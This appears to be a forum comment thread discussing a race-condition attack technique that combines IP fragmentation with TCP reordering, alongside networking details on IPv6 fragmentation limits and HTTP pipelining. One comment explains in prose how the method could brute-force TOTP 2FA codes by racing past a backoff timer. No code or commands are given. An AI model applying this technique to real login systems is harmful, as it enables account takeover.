It should be noted that IP fragmentation is quite limited and often buggy. IPv6 only requires receivers to re-assemble an IP packet that is at most 1500 bytes, so sending a 65KB TCP segment is quite likely to just result in dropped packets.
Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link. Jumbo frames (~9000 bytes) and even beyond are possible if all the devices are configured in the right way. Additionally, IPv6 actually supports packets up to ~4GiB in size (so called "jumbograms", with an additional header), though I think it would be truly hard to find any network which uses this feature.
> Alternatively, the 1500 limit is not a hard limit, and depends entirely on your link.
The two concepts are completely independent and orthogonal. You can have a 1280 byte link MTU on a device which happily reassembles 9x fragments into a 9000 byte payload. You can also have another device with a 9000 byte link MTU which refuses to reassemble 2x 1280 byte fragments into a single 2000 byte packet simply because it doesn't have to. Both devices are IPv6 compliant.
Well, I suppose there is 1 causal relationship between link layer MTU and IPv6 fragmentation: "how much bigger than 1280 bytes can the individual fragments be".
Oh, yes, what I meant to say is that you can send frames larger than 1500 bytes without resorting to IP fragmentation, in certain networks. I can see how it sounded like the "1500 limit" was the IPv6 reassembly limit, but I wanted to refer to the 1500 limit for a single frame.
Indeed. If the attack works by exploiting (reliable) TCP re-ordering algorithms in the server then why also bother with (unreliable) IP fragmentation? Just send a larger number of out-of-order TCP packets, surely?
The article says the attack was more successful when using IP fragmentation in conjunction with TCP reordering. Probably it is two separate memory areas that have independent limits allowing you to store more data in the stack.
Two techniques, even: More requests processed at once, after a very (bandwidth-adjusted) precisely user-controlled starting point.
One helps with race conditions in the server, the other helps racing 3rd party requests. Sending a highly-efficient "go" packet for many HTTP requests is sure ruining the fun for all the others awaiting some pre-announced concert ticket / GPU sale to open.
If the website accounting is merely "eventually consistent" between threads/servers and you are able to fire many (large) requests at a precise (determined by small packet) point in time, both techniques work in tandem - could have (one of) your post(s) appear with repeating digits (such as at https://news.ycombinator.com/item?id=42000000) without just seeing "Sorry, we're not able to serve your requests this quickly."
I think it's ultimately about bypassing a TOTP 2FA by exploiting a race condition in the authentication failure backoff timer to submit thousands of possible codes simultaneously. The technique is about abusing the TCP stack and IP fragmentation to load up the stack on the server with as much data as possible before hitting it with a "go" packet that completes the fragments on the head of line blocking data buffer and spills all of the contents into the webserver before a single RTT can be completed.
Many real-world web applications “shockingly” don’t guarantee ACID-style transactional state updates, and thus are vulnerable to race conditions.
Suppose (for instance) that the application tier caches user session information by some internal, reused ID.
If that state is updated transactionally, with an ID assigned to a new session atomically with the insertion of that new session’s data, no problem.
But if the session is assigned a previously used ID a few microseconds before the new session’s data is populated, a racing request could see the old data from a different user.
I assume with HTTP/1.1 this would be less useful, since each synchronized request would require another socket, thus hitting potential firewalls limiting SYN/SYN-ACK rate and/or concurrent connections from the same IP.
In some respects this is abusing the exact reason we got HTTP/3 to replace HTTP/2 – it's a deliberate Head-of-Line (HoL) blocking.
You can pipeline requests on http/1.1. But most servers handle one request at a time, and don't read the next request until the current request's response is finished. (And mainstream browsers don't typically issue pipelined requests on http/1.1, IIRC)
If you have a connection per request, and you need 1000 requests to be 'simultaneous', you've got to get a 1000 packet burst to arrive closely packed, and that's a lot harder than this method (or a similar method suggested in comments of sending unfragmented tcp packets out of order so when the first packet of the sequence is recieved, the rest of the packets are already there)
It's less that the socket is bidrectional, but that most requests have an unambiguous end. A pipeline-naive server with Connection: keep-alive is going to read the current request until the end, send a response, and then read from there. You don't have to wait for the response to send the next request; and you'll get better throughput if you don't.
Some servers do some really wacky stuff if you pipeline requests though. The RFC is clear, the server should respond to each request one at a time, in order. However, some servers choose not to --- I've seen out of order responses, interleaved responses, as well as server errors in response to pipelined requests. That's one of the reasons browsers don't tend to do it.
You also rightfully bring up the question of what to do if the connection is closed and your request has no response. IMHO, if you got Connection: Close in a response, that's an unambigious case --- the server told you when serving response N that it won't send any more responses, and I think it's safe to resend any N+1 requests, as the server knows you won't get the response and so it shouldn't process those requests. It's less clear when the connection is closed without explicit signalling --- the server may be processing the requests and you don't know. http/2 provides for an explicit close that tells you what the last request it saw, which addresses this, on http/1.1 when the server closes unexpectedly it's not clear. That often happens when the connection is idle.
An HTTP/1.1 server may send hints about how many requests until it closes the connection (which would be explicit), as well as the idle timeout (in seconds). But it's still not fun when you send a request and you receive a TCP close, and you have to guess if the server closed before it got the request (you should resend) or after (your request crashed the server, and you probably shouldn't resend).
Some servers didn't support it, most did though. Which was why when the first HTTP2 tech demos came out, I really couldn't see the enormous speedups people were trying to demo.
It's probably a reference to the news article about Whatsapp increasing maximum group size to 256 and a journalist pondering over why such a specific number was chosen. OP probably meant it a similar sense, why was 65535 chosen (but it's not really such a mystery).